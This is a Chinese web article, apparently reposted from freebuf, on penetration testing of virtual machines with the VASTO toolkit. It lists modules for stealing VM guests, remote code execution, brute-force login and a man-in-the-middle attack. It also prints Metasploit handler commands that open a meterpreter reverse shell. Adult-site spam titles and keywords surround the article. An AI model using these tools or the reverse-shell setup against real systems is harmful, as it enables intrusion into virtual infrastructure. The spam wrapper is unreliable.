成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

針對虛擬機的滲透測試

安全
如今虛擬化在各個企業中應用的越來越多,且火熱的云計算也依托于此技術。虛擬化技術確實能夠使物理資源的利用更加靈活和便捷,那么虛擬機的安全性如何?相比傳統架構,是否像傳說中的一樣安全?

如今虛擬化在各個企業中應用的越來越多,且火熱的云計算也依托于此技術。虛擬化技術確實能夠使物理資源的利用更加靈活和便捷,那么虛擬機的安全性如何?相比傳統架構,是否像傳說中的一樣安全?

什么是虛擬化

虛擬化是指計算機元件在虛擬的基礎上而不是真實的基礎上運行。虛擬化技術可以擴大硬件的容量,簡化軟件的重新配置過程。CPU的虛擬化技術可以單CPU模擬多CPU并行,允許一個平臺同時運行多個操作系統,并且應用程序都可以在相互獨立的空間內運行而互不影響,從而顯著提高計算機的工作效率。我們先來看看虛擬機的層次結構圖。

虛擬機完全獨立于其底層物理硬件。 例如,你可以為虛擬機配置與底層硬件上存在的物理組件完全不同的虛擬組件(例如,CPU、網卡、SCSI 控制器)。 同一物理服務器上的各個虛擬機甚至可以運行不同類型的操作系統(Windows、Linux 等)

針對虛擬機的滲透測試

VASTO是一個專用的虛擬機滲透測試工具,支持VMware, Oracle和Xen,可以與神器Metasploit有很好的結合。使用前需要先解壓,然后復制metasploit文件夾下中

VASTO的主要模塊如下,功能還是比較強大的

abiquo_guest_stealer – Abiquo guest stealer

abiquo_poison – Abiquo poison

eucalyptus_bouncer – Eucalyptus Bouncer

eucalyptus_poison – Eucalyptus Poison

oraclevm_oravma_fileread – Oracle VM agent remote code execution

vmware_autopwner – VMautopwn

vmware_guest_stealer – VMware Guest Stealer

vmware_login – VMware Login check scanner

vmware_session_rider – VMware Session Rider

vmware_studio_upload – VMware Studio<2.0.0.946-172280 Remote Code Execution

vmware_updatemanager_traversal – Update manager path traversal

vmware_version – VMware products fingerprintervmware_vilurker – VIlurker VIclient attack

vmware_webaccess_portscan – VMware Web Access Relay Port Scanner

xen_login – Xen Login Check Scanner

oracle_oravma_exec – Oracle VM agent remote code execution

vmware_sfcbd_exec - VMware VAMI-sfcbd remote code exec

vmware_tomcat_killer – VMware tomcat killer

Versionsscanner Modul:

用于判斷VM的版本等信息

Login Scanner Modul:

這個模塊可以使用字典嘗試暴力登錄虛擬機

vilurker module

這個模塊原理即利用ettercap等進行中間人攻擊,欺騙成功后,當被攻擊者(client)訪問server時會彈出窗體,若點擊即反彈一個meterpreter。

先multi/handler監聽

msf > use multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST <Local Host IP here>

msf exploit(handler) > exploit

欺騙過程如下

返回shell(meterpreter)

責任編輯:藍雨淚 來源: freebuf
相關推薦

2017-02-09 09:25:43

2013-03-15 14:59:03

VMwarevSphere ESXWorkstation

2012-05-18 10:22:23

2020-01-17 10:52:37

無服務器容器技術

2010-07-26 09:02:38

2013-07-17 09:32:58

2009-08-21 16:59:42

VMware Play

2023-04-26 07:51:36

虛擬機操作系統進程

2024-07-23 16:22:54

2014-02-21 11:20:34

KVMXen虛擬機

2012-04-10 10:29:29

2023-09-03 17:05:20

虛擬機

2010-12-23 14:05:12

虛擬機

2018-06-19 15:39:21

HeapJava虛擬機

2011-05-13 10:49:50

虛擬機Oracle安裝

2011-06-22 13:35:55

JVM

2011-12-12 09:08:48

OpenStack虛擬機監控

2009-06-12 16:02:58

裝載Java虛擬機

2009-10-13 15:00:36

物理機虛擬機網絡安全

2010-01-21 11:17:36

xen虛擬機
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 日韩在线视频一区 | 成人性视频在线 | 午夜免费看 | 黄色网址免费看 | 国产精品三级 | 一级黄在线观看 | 91成人午夜性a一级毛片 | 精品国产欧美 | 男女下面一进一出网站 | 精品国产欧美 | 亚洲 欧美 日韩 在线 | 一区二区三区成人 | 亚洲欧美中文日韩在线 | 国产精品久久久久久影院8一贰佰 | 欧美1—12sexvideos | 日韩在线视频观看 | 国产精品乱码一二三区的特点 | 97精品超碰一区二区三区 | 国产成人一区二区三区 | 国产 日韩 欧美 在线 | 日本在线观看网址 | 久久精品中文字幕 | 老司机免费视频 | 亚洲天堂中文字幕 | 人人看人人干 | 欧美黄色片 | 日韩欧美中文字幕在线视频 | 综合五月婷 | 国产精品久久久久久久久久久久 | 91av在线影院 | 国精产品一区一区三区免费完 | 成人一区精品 | 国产精品久久国产精品 | 久久99国产精品 | 国产免费一区二区三区 | 国产一区二区小视频 | 国产成人综合在线 | 91亚洲免费| 视频二区在线观看 | 岛国av在线免费观看 | 精品无码久久久久久国产 |